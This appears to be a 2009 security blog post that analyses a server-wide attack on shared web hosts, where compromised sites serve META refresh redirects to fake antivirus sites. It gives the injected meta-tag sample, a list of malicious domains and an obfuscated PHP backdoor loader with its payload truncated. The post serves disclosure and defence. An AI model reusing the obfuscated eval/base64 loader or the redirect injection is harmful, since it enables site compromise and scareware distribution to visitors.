I’ve discovered a new emerging malware attack today. Actually two attacks, but in this post I’ll review only one of them – server-wide goscanpark .com/goscansoon .com meta redirects.
I discovered this attack when checked Unmask Parasites logs. I noticed that many unrelated websites contained the same suspicious script so I decided to investigate this issue. The investigation is not complete yet but I think the information I’ve already collected will be useful for owners of compromised web sites. And I hope the missing parts will be added by you, the readers. Update ( July 27, 2009) : the comments are really very informative. make sure to read them.
Fact #1. This exploit is well detected by Unmask Parasites (this is how I discovered it). When you check compromised sites, you will see a report with one suspicious inline script and without any external references.
Fact #2. You won’t see any external references even when your web pages link to external sites because the malicious content replaces the original content of the web pages (it is not injected as a part of your web pages).
Fact #3. The original content of the web pages is not lost (overwriten). When you open your site in a web browser, in many cases you’ll see the original content intact (and no malicious code at all).
Fact #4. The malicious content is not served all the time. When you view the site in a web browser, you have more chances to be served with a legitimate original content. However when you use tools like wget or Unmask Parasites, there chances that the response will be malicious is higher. I guess it’s has to do with cookies and the User-Agent header.
Fact #5. The malicious code is not always the same. There are two modifications:
1. This is what Unmask Parasites and tools like wget see:
This code only sets a cookie that expires in one day (they use octal numbers in the expression):
sessionid=39128605A531; path=/; expires=Fri, 24 Jul 2009 14:19:37 GMT
2. However when you load the same pages in a web browser (I used Firefox 3 with NoScript), the code is different:
This code injects meta tags that instruct your web browser to open a malicious site:
<META HTTP-EQUIV='Refresh' CONTENT='0; URL=hxxp://goscanpark,com/?uid=removed'>
<meta http-equiv='pragma' content='no-cache'>
<meta name='robots' content='noindex,nofollow'>
Fact #6. Goscanpark is a bogus Antivirus site. It distributes scareware (presumably packed with other trojans). You can read about this sort of sites and how they trick unsuspecting visitors into installing their fake AV scanners (and then paying for them) in my older articles that I posted this winter.
Fact #7. Unlike previous attacks that redirected only search engine traffic, this one can redirect any visitor. That’s why it can be easier detected by site owners who rarely use search engines to visit their own sites.
Fact #8. However the fact that the exploit is easier to detect doesn’t mean it is easier to remove. This is not a .htaccess exploit. And it’s not a redirect HTTP header injected by some server script. The attack uses client side redirects via a META tag’s Refresh command instead of any type of server-side redirects. It doesn’t seem to modify files.
Fact #9. The malicious code seems to be served by some PHP script. The HTTP headers of the malicious responses contain lines like “X-Powered-by: PHP/5.2.6” while static content doesn’t have such headers.
Fact #10. This is a server-wide exploit. I checked three different servers in three different locations (The UK, Czechia and Singapore). They all hosted multiple (from dozens to hundreds) websites sharing the same IP. And on about 80% of those websites, I found the goscanpark redirect code. I guess I didn’t find the malicious code on all sites only because of the intermittent nature of the exploit. And yes, most web sites were unrelated to each other (different owners). This reminds me of the Beladen server-wide exploit. Hackers must be using the same vulnerability.
Fact #11. Actually this exploit seems to be a successor of the Beladen exploit. On a safe browsing diagnostic page of one site I discovered the following message:
Malicious software is hosted on 3 domain(s), including beladen .net/, googleanalytlcs .net/, globalsecurityscans .com/.
1 domain(s) appear to be functioning as intermediaries for distributing malware to visitors of this site, including googleanalytlcs .net/.
This is a sign of the Beladen attack. And I know that it was a server-wide exploit and all sites on the compromised server were affected. It looks like the backdoor script is still there and hackers used it to upload scripts for a new type of attack.
Fact #12. There are multiple domain names involved in this attack. In addition to goscanpark .com, on some servers the malicious code may redirect visitors to goscansoon .com, goslimscan .com, goscansome .com, securityexamineonline .com, globalsecurityscans .com, safetyshareonline .com, likeshoe .info, engaolika .info, neborin .info, fan6scan .com, scanriteweb .com, gagtemple .info, neatsore .info, rideth .info, ina6co .com, razing .info, scanwebtech .com, in5id .com, theise .info, licens .info, pridge .info, minist .info, cheapsecurityscan .com, worldbestonlinescan9 .com, justseethisonline .com, securityreadonline .com, botchy .info, best-virus-scanner5 .com, indianapolis-sales .com, securityproductsupply .com, securitytoolonline .com, senioradviceblog .com, nabobil .net, a-a-access .com, overviewforexbids .com, delete-all-virus01 .com, usdisturbed .cn, freetvnews2 .com, mycomputer-scannerp .com, wwwonlinescanner .com, read-cnn2 .com, winfixscanner9 .com, mycomputertotalscann11 .com, mycomputerbestscan11 .com, mycomputer-scanner1a .com, mycomputerfastscan11 .com, hollistergrany .cn, dolce-unt-gabbana .com, makkahintro .com, mytotalscan16 .com, my-garden-state .com, cradleoffilthfan .com, armysun3 .com, try-your-destiny .cn, forex-hideouts .com, (the list is not complete).
Fact #13. Google doesn’t always detect this exploit. On checked servers, some sites were marked as suspicious, while other (with the same scan date on their Safe Browsing diagnostic pages) weren’t. It’s either because some of the domain names no longer resolve (goscanpark .com) or because of the elusive nature of the exploit (the same was with the Beladen exploit detection).
Anyway, if the issue is not resolved all sites can be blacklisted soon.
Now let me tell you how this exploit might work.
I assume this attack is indeed similar to the Beladen attack or it is its successor.
You can find more details about this Linux Apache attack in this great article.
If your site is affected by this attack, do the following:
My research is not complete. I’d like to hear from owners of affected sites and from server admins of compromised web servers. You can probably provide missing information about the attack or correct me if something in my article is not accurate. I’m also interested in any information about the vulnerability that makes this nasty attack possible. Any comments are welcome.
Update (October 15, 2009): There is a new modification of a backdoor PHP script that obfuscates the eval and base64_decode calls so that it can’t be found with a simple regexp. Thanks Thomas J. Raef
<?php $PyIqJDl='#####e##############################v###a####l(b########a####s###e###########6##4##########_##d###eco###d####e#######(#\'ZXJyb3JfcmVwb3J0aW5nKDApOwokbWQ ***a lot of encoded text removed here for brevity*** Yz1iYXNlNjRfZGVjb2RlKCRjKTsKZXZhbCgkYyk7Cn0=\'));';
$PyIqJDl=str_replace('#', '', $PyIqJDl);$OOxbqtu=create_function('',$PyIqJDl);$OOxbqtu(); ?>
July 27, 2009: At this point we have a few interesting comments:
Thomas J. Raef shared his client findings. On the affected shared server with 1,200 web sites they found a bogus “crontab” process run as user “nobody”. When they killed the process, the attack stopped.
jamie also found those bogus crontab processes, then traced the /proc logs and identified the compromised account. Then he checked POST requests in access logs and located the backdoor scripts.
Chris posted his access logs with the POST requests that presumably started the attack.
Great comment from To: who shared
Thanks guys! Your comments make this post really informative and useful.